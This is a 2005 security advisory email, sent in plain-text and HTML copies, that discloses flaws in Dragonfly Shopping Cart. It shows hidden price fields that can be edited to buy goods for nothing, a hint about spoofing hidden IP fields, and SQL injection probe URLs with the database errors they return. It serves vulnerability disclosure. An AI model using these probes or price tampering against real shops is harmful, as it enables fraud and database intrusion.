------=_NextPart_001_0012_01C586EF.F4564F50 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc = or even code them. Learn more at http://www.dbtech.org Severity: High Title: Dragonfly Shopping Cart Multiple vulnerabilities Date: 11/07/2005 Vendor: DragonFly Shopping Cart Vendor Website: = http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=3D5 Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow = modifiying of prices along with Sql injection vulnerabilities. Proof of Concept Exploits: Hidden Price Value Vulnerability You can modify these fields to modify the price of the product and thus = be able to purchase the biggest and most expensive products for the = cheapest possible prices, or even nothing. /demo/dc_Categorieslist.asp HPVV /demo/dc_Categoriesview.asp HPVV /demo/dc_productslist.asp HPVV /demo/dc_productslist_Clearance.asp HPVV There are also many other hidden fields like ip address etc which can be = used to make the attack "technically" more anonymous though any normal = logging system would catch you ;). Sql Injections /demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5 Microsoft JET Database Engine error '80040e07'=20 Data type mismatch in criteria expression.=20 /demo/dc_Categoriesview.asp, line 1054=20 /demo/dc_Categoriesview.asp?key=3D%26dir%26 Microsoft JET Database Engine error '80040e14'=20 Syntax error (missing operator) in query expression '[CategoryKey] =3D = &dir&'.=20 /demo/dc_Categoriesview.asp, line 1054=20 /demo/dc_productslist_Clearance.asp Microsoft JET Database Engine error '80040e14'=20 Syntax error in string in query expression '([ProductActive] =3D 'show' = AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < = #7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND = ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' = ))'.=20 /demo/dc_productslist_Clearance.asp, line 292=20 /demo/dc_productslist_Clearance.asp?cmd=3D%27 Microsoft JET Database Engine error '80040e14'=20 Syntax error in string in query expression '([ProductActive] =3D 'show' = AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < = #7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND = ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' = ))'.=20 /demo/dc_productslist_Clearance.asp, line 292=20 /demo/ratings.asp??PID=3D' Microsoft JET Database Engine error '80040e14'=20 Syntax error (missing operator) in query expression '[ProductKey]=3D''.=20 /demo/ratings.asp, line 68=20 /demo/dc_Productsview.asp Microsoft JET Database Engine error '80040e07'=20 Data type mismatch in criteria expression.=20 /demo/dc_Productsview.asp, line 931=20 /demo/dc_forum_Postslist.asp?start=3D' Microsoft VBScript runtime error '800a000d'=20 Type mismatch: 'nTotalRecs'=20 /demo/dc_forum_Postslist.asp, line 319=20 /demo/dc_forum_Postslist.asp?key_m=3D' Microsoft JET Database Engine error '80040e07'=20 Data type mismatch in criteria expression.=20 /demo/dc_forum_Postslist.asp, line 200=20 /demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2A%29&psea= rchtype=3D' Microsoft JET Database Engine error '80040e07'=20 Data type mismatch in criteria expression.=20 /demo/dc_forum_Postslist.asp, line 200=20 /demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2A%29&psea= rchtype=3D1 Microsoft JET Database Engine error '80040e07'=20 Data type mismatch in criteria expression.=20 /demo/dc_forum_Postslist.asp, line 200=20 Author: These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. = Lookout for my soon to come out book on Secure coding with php. -------------------------------------------------------------------------= ------- =20 Sincerely,=20 Diabolic Crab=20 ------=_NextPart_001_0012_01C586EF.F4564F50 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= /FONT>
 
Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
 
Severity: High
Title: Dragonfly = Shopping Cart=20 Multiple vulnerabilities
Date: 11/07/2005
 
Vendor: DragonFly Shopping = Cart
Vendor Website:=20 http://www.incredibleinteractive.com/Active/dc_Productsview.asp?k= ey=3D5
Summary:=20 Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying = of prices=20 along with Sql injection vulnerabilities.
 
Proof of Concept Exploits:
 
Hidden Price Value Vulnerability
You = can modify=20 these fields to modify the price of the product and thus be able to = purchase the=20 biggest and most expensive products for the cheapest possible prices, or = even=20 nothing.
/demo/dc_Categorieslist.asp
HPVV
 
<input type=3D"hidden"=20 name=3D"x_DragonflyCartProductPrice" value=3D"15.49" = size=3D"4">
 
 
 
/demo/dc_Categoriesview.asp
HPVV
 
<input type=3D"hidden"=20 name=3D"x_DragonflyCartProductPrice" value=3D"0" = size=3D"4">
 
 
 
/demo/dc_productslist.asp
HPVV
 
<input type=3D"hidden"=20 name=3D"x_DragonflyCartProductPrice" value=3D"0" = size=3D"4">
 
 
 
/demo/dc_productslist_Clearance.asp
HPVV
 
<input type=3D"hidden"=20 name=3D"x_DragonflyCartProductPrice" value=3D"0" = size=3D"4">
 

There are also many other hidden fields like ip address etc = which can=20 be used to make the attack "technically" more anonymous though any = normal=20 logging system would catch you ;).
 
 
 
Sql Injections
 
/demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5
 
Microsoft JET Database Engine error '80040e07'
 
Data type mismatch in criteria expression.
 
/demo/dc_Categoriesview.asp, line 1054
 
 
 
/demo/dc_Categoriesview.asp?key=3D%26dir%26
Microsoft JET = Database Engine=20 error '80040e14'
 
Syntax error (missing operator) in query expression '[CategoryKey] = =3D=20 &dir&'.
 
/demo/dc_Categoriesview.asp, line 1054
 
 
 
/demo/dc_productslist_Clearance.asp
 
Microsoft JET Database Engine error '80040e14'
 
Syntax error in string in query expression '([ProductActive] =3D = 'show' AND=20 ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < = #7/7/2005#=20 AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] = LIKE '%1%'=20 OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
 
/demo/dc_productslist_Clearance.asp, line 292
 
 
 
/demo/dc_productslist_Clearance.asp?cmd=3D%27
 
Microsoft JET Database Engine error '80040e14'
 
Syntax error in string in query expression '([ProductActive] =3D = 'show' AND=20 ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < = #7/7/2005#=20 AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] = LIKE '%1%'=20 OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
 
/demo/dc_productslist_Clearance.asp, line 292
 
 
 
/demo/ratings.asp??PID=3D'
 
Microsoft JET Database Engine error '80040e14'
 
Syntax error (missing operator) in query expression = '[ProductKey]=3D''.=20
 
/demo/ratings.asp, line 68
 
 
 
/demo/dc_Productsview.asp
 
Microsoft JET Database Engine error '80040e07'
 
Data type mismatch in criteria expression.
 
/demo/dc_Productsview.asp, line 931
 
 
 
/demo/dc_forum_Postslist.asp?start=3D'
 
Microsoft VBScript runtime error '800a000d'
 
Type mismatch: 'nTotalRecs'
 
/demo/dc_forum_Postslist.asp, line 319
 
 
 
/demo/dc_forum_Postslist.asp?key_m=3D'
 
Microsoft JET Database Engine error '80040e07'
 
Data type mismatch in criteria expression.
 
/demo/dc_forum_Postslist.asp, line 200
 
 
 
/demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2= A%29&psearchtype=3D'
 
Microsoft JET Database Engine error '80040e07'
 
Data type mismatch in criteria expression.
 
/demo/dc_forum_Postslist.asp, line 200
 
 
 
/demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2= A%29&psearchtype=3D1
 
Microsoft JET Database Engine error '80040e07'
 
Data type mismatch in criteria expression.
 
/demo/dc_forum_Postslist.asp, line 200
 

Author:
These vulnerabilties have been found and released by = Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, = please feel=20 free to contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com = or http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come out book on Secure coding with = php.



Sincerely,
Diabolic Crab
------=_NextPart_001_0012_01C586EF.F4564F50--